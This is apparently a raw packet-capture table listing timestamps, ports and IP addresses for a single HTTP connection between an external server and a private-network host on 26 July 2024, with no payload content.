Jul 26, 2024 17:56:20.877813101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877821922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877827883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877846003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877856970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877866983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877876043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877880096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877890110 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877898932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877908945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877916098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877916098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877918959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877948999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877952099 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877952099 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877958059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877966881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877978086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877986908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877994061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877994061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877996922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878009081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878019094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878035069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878045082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878045082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.878046036 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.878056049 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878066063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.878089905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.878089905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.878153086 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.880981922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.880992889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881004095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881014109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881022930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881032944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881042957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881052971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881056070 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881056070 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881069899 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881079912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881095886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881107092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881109953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881109953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881118059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881130934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881143093 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881145000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881153107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881162882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881175995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881186962 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881191015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881191015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881196022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881206989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881218910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881228924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881232023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881232023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881238937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881248951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.881280899 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881280899 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.881352901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.886710882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.886832952 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887552977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887598991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887788057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887805939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887815952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887826920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887836933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887841940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887847900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887859106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887868881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887887955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887887955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887912035 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887923002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887933016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887940884 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887940884 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887943029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887953997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887964010 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887974024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887984991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.887989044 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887989044 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.887995958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888024092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888024092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888256073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888891935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888902903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888914108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888925076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888936996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888936996 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888946056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888956070 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888967037 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888978004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888988018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.888994932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888994932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.888998985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889009953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889020920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889027119 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889027119 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889030933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889041901 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889051914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889061928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889064074 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889096975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889107943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889864922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889877081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889885902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889924049 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889931917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889942884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889952898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889955997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889964104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889974117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889981985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.889982939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.889993906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890005112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890016079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890024900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890028000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890028000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890038013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890048027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890054941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890059948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890083075 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890098095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890141010 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890630960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890641928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890651941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890667915 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890688896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890693903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890698910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890703917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890713930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890718937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890728951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890738964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890741110 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890748978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890759945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890769958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890780926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890785933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890791893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890827894 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890827894 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890837908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890849113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890858889 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890858889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.890886068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.890919924 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891609907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891623020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891633034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891649008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891659021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891669035 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891674042 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891674042 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891680002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891690016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891700983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891710043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891719103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891719103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891736984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891746998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891752958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891752958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891757011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891768932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891777039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891787052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891797066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891807079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891807079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891808033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891819000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891829967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891835928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891845942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.891870975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891870975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.891896963 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892564058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892575979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892591000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892601013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892611980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892621994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892632008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892633915 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892633915 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892641068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892651081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892663002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892668009 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892673016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892683029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892709017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892709017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892744064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892754078 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892764091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.892770052 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892797947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.892862082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.895186901 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.895200014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.895210028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.895272970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.896106958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896117926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896127939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896143913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896152020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.896181107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896193027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896203041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896229982 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.896229982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896229982 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.896240950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.896287918 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.896287918 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.897120953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897181034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.897912025 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897923946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897933006 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897943020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897953033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897962093 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.897969007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897978067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897989035 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.897998095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898025990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.898025990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.898036003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898046017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898055077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898063898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.898063898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898073912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898123980 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.898124933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.898950100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898960114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898969889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898978949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898988008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898998022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.898998976 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899008036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899013996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899032116 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899053097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899055004 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899065018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899074078 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899077892 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899121046 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899856091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899867058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899876118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899884939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899894953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899909973 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899919987 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899920940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899930954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899940014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899950027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899952888 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899960041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899969101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899977922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899988890 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.899993896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.899993896 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900000095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900010109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900019884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900028944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900032043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900032997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900053024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900053978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900063992 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900069952 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900074959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900084972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900110960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900110960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900135994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900830984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900842905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900856018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900865078 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900881052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900885105 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900893927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900903940 CEST	80	49705	185.215.113.16	192.168.2.5
